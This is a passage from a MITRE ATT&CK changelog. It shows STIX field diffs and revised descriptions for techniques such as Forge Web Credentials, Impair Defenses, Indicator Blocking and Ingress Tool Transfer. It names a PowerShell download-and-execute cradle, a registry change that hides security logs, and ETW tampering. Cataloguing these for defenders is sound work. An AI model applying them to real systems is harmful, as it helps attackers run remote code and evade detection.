external_references[4]['description']: National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018. → Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.
external_references[4]['url']: https://nvd.nist.gov/vuln/detail/CVE-2014-7169 → https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
external_references[5]['source_name']: Cisco Blog Legacy Device Attacks → NVD CVE-2016-6662
external_references[5]['description']: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. → National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.
external_references[5]['url']: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 → https://nvd.nist.gov/vuln/detail/CVE-2016-6662
external_references[6]['source_name']: OWASP Top 10 → NVD CVE-2014-7169
external_references[6]['description']: OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018. → National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.
external_references[6]['url']: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project → https://nvd.nist.gov/vuln/detail/CVE-2014-7169
external_references[7]['source_name']: US-CERT TA18-106A Network Infrastructure Devices 2018 → Cisco Blog Legacy Device Attacks
external_references[7]['description']: US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. → Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
external_references[7]['url']: https://us-cert.cisa.gov/ncas/alerts/TA18-106A → https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Application Log: Application Log Content → Network Traffic: Network Traffic Content
x_mitre_data_sources[1]: Network Traffic: Network Traffic Content → Application Log: Application Log Content
x_mitre_version: 2.3 → 2.4
iterable_item_added
STIX Field: New Value
external_references: {'source_name': 'OWASP Top 10', 'description': 'OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.', 'url': 'https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project'}
external_references: {'source_name': 'US-CERT TA18-106A Network Infrastructure Devices 2018', 'description': 'US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://us-cert.cisa.gov/ncas/alerts/TA18-106A'}

[T1068] Exploitation for Privilege Escalation

Current version: 1.5

Version changed from: 1.4 → 1.5

Dropped Mitigations:

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-06-16 19:25:12.835000+00:00 → 2023-04-07 17:13:54.168000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Driver: Driver Load → Process: Process Creation
x_mitre_data_sources[1]: Process: Process Creation → Driver: Driver Load
x_mitre_version: 1.4 → 1.5

[T1606] Forge Web Credentials

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)

New Description
Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials.(Citation: AWS Temporary Security Credentials) Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Dylan']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 14:26:52.179000+00:002023-04-12 21:35:48.084000+00:00
descriptionAdversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may generate these credential materials in order to gain access to web resources. 
This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials.(Citation: AWS Temporary Security Credentials) Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)
external_references[1]['source_name'] | GitHub AWS-ADFS-Credential-Generator | AWS Temporary Security Credentials
external_references[1]['description'] | Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020. | AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.
external_references[1]['url'] | https://github.com/damianh/aws-adfs-credential-generator | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html
external_references[2]['source_name'] | Pass The Cookie | Unit 42 Mac Crypto Cookies January 2019
external_references[2]['description'] | Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019. | Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.
external_references[2]['url'] | https://wunderwuzzi23.github.io/blog/passthecookie.html | https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
external_references[3]['source_name'] | Unit 42 Mac Crypto Cookies January 2019 | GitHub AWS-ADFS-Credential-Generator
external_references[3]['description'] | Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. | Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.
external_references[3]['url'] | https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ | https://github.com/damianh/aws-adfs-credential-generator
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Pass The Cookie', 'description': 'Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.', 'url': 'https://wunderwuzzi23.github.io/blog/passthecookie.html'}
x_mitre_data_sources | | Logon Session: Logon Session Creation
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Logon Session: Logon Session Creation |

[T1615] Group Policy Discovery

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path <code>\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)  Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

New Description
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)  Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New Value
x_mitre_permissions_required | ['User'] |
values_changed
STIX Field | Old value | New Value
modified | 2021-10-15 23:16:28.296000+00:00 | 2023-01-06 12:41:08.579000+00:00
description
  Old value: Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.
  New value: Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.
external_references[1]['source_name'] | TechNet Group Policy Basics | ADSecurity GPO Persistence 2016
external_references[1]['description'] | srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019. | Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.
external_references[1]['url'] | https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ | https://adsecurity.org/?p=2716
external_references[2]['source_name'] | ADSecurity GPO Persistence 2016 | Microsoft gpresult
external_references[2]['description'] | Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019. | Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.
external_references[2]['url'] | https://adsecurity.org/?p=2716 | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
external_references[3]['source_name'] | Microsoft gpresult | Github PowerShell Empire
external_references[3]['description'] | Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021. | Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
external_references[3]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult | https://github.com/PowerShellEmpire/Empire
external_references[4]['source_name'] | Github PowerShell Empire | TechNet Group Policy Basics
external_references[4]['description'] | Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016. | srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.
external_references[4]['url'] | https://github.com/PowerShellEmpire/Empire | https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Active Directory: Active Directory Object Access
x_mitre_data_sources[1] | Command: Command Execution | Script: Script Execution
x_mitre_data_sources[2] | Script: Script Execution | Process: Process Creation
x_mitre_data_sources[3] | Process: Process Creation | Network Traffic: Network Traffic Content
x_mitre_data_sources[4] | Active Directory: Active Directory Object Access | Command: Command Execution
x_mitre_version | 1.0 | 1.1

[T1562] Impair Defenses

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.  Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

New Description
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.  Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)  Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

New Mitigations:

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-19 16:32:56.502000+00:00 | 2023-04-15 00:48:46.626000+00:00
description
  Old value: Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
  New value: Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown) Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Cloud Service: Cloud Service Modification | Firewall: Firewall Rule Modification
x_mitre_data_sources[1] | Firewall: Firewall Rule Modification | Cloud Service: Cloud Service Disable
x_mitre_data_sources[2] | Process: Process Termination | Command: Command Execution
x_mitre_data_sources[3] | Service: Service Metadata | User Account: User Account Modification
x_mitre_data_sources[4] | Process: Process Creation | Cloud Service: Cloud Service Modification
x_mitre_data_sources[5] | Driver: Driver Load | Firewall: Firewall Disable
x_mitre_data_sources[6] | Firewall: Firewall Disable | Script: Script Execution
x_mitre_data_sources[7] | Command: Command Execution | Driver: Driver Load
x_mitre_data_sources[8] | Cloud Service: Cloud Service Disable | Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[9] | Windows Registry: Windows Registry Key Deletion | Sensor Health: Host Status
x_mitre_data_sources[10] | Windows Registry: Windows Registry Key Modification | Windows Registry: Windows Registry Key Deletion
x_mitre_data_sources[11] | Sensor Health: Host Status | Process: Process Termination
x_mitre_data_sources[12] | Script: Script Execution | Process: Process Creation
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Emotet shutdown', 'description': 'The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.', 'url': 'https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/#:~:text=Don’t%20Sleep%20has%20the%20capability%20to%20keep%20the%20computer%20from%20being%20shutdown%20and%20the%20user%20from%20being%20signed%20off.%20This%20was%20likely%20done%20to%20ensure%20nothing%20will%20interfere%20with%20the%20propagation%20of%20the%20ransomware%20payload'}
x_mitre_data_sources | | Service: Service Metadata

[T1562.006] Impair Defenses: Indicator Blocking

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).  ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.  In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.  In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).

New Description
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).  For example, adversaries may modify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)   ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.  In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.  In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).
Details
dictionary_item_added
STIX Field | Old value | New Value
external_references | | Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-571 |
values_changed
STIX Field | Old value | New Value
modified | 2022-06-30 16:44:16.962000+00:00 | 2023-04-12 15:25:10.496000+00:00
description
  Old value: An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).
  New value: An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). For example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).
external_references[1]['source_name'] | LemonDuck | disable_win_evt_logging
external_references[1]['description'] | Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022. | Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[1]['url'] | https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/ | https://ptylu.github.io/content/report/report.html?report=25
external_references[2]['source_name'] | Microsoft Lamin Sept 2017 | LemonDuck
external_references[2]['description'] | Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018. | Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.
external_references[2]['url'] | https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A | https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/
external_references[3]['source_name'] | Microsoft About Event Tracing 2018 | Microsoft Lamin Sept 2017
external_references[3]['description'] | Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019. | Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.
external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events | https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
external_references[4]['source_name'] | Medium Event Tracing Tampering 2018 | Microsoft About Event Tracing 2018
external_references[4]['description'] | Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019. | Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.
external_references[4]['url'] | https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 | https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
external_references[5]['source_name'] | capec | Medium Event Tracing Tampering 2018
external_references[5]['url'] | https://capec.mitre.org/data/definitions/571.html | https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | Lucas Heiligenstein
x_mitre_data_sources | | Windows Registry: Windows Registry Key Modification
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |

[T1070] Indicator Removal

Current version: 2.1

Version changed from: 2.0 → 2.1

Dropped Mitigations:

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21 16:12:54.457000+00:00 | 2023-04-11 22:27:54.003000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | File: File Modification
x_mitre_data_sources[2] | File: File Modification | Windows Registry: Windows Registry Key Deletion
x_mitre_data_sources[3] | File: File Deletion | Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[4] | Command: Command Execution | User Account: User Account Deletion
x_mitre_data_sources[5] | Windows Registry: Windows Registry Key Modification | File: File Metadata
x_mitre_data_sources[6] | File: File Metadata | User Account: User Account Authentication
x_mitre_data_sources[8] | Scheduled Job: Scheduled Job Modification | Command: Command Execution
x_mitre_data_sources[10] | Windows Registry: Windows Registry Key Deletion | Scheduled Job: Scheduled Job Modification
x_mitre_data_sources[11] | User Account: User Account Authentication | Network Traffic: Network Traffic Content
x_mitre_version | 2.0 | 2.1
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Application Log: Application Log Content
x_mitre_data_sources | | File: File Deletion
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/93.html', 'external_id': 'CAPEC-93'} |

[T1105] Ingress Tool Transfer

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).   Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)  On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)

New Description
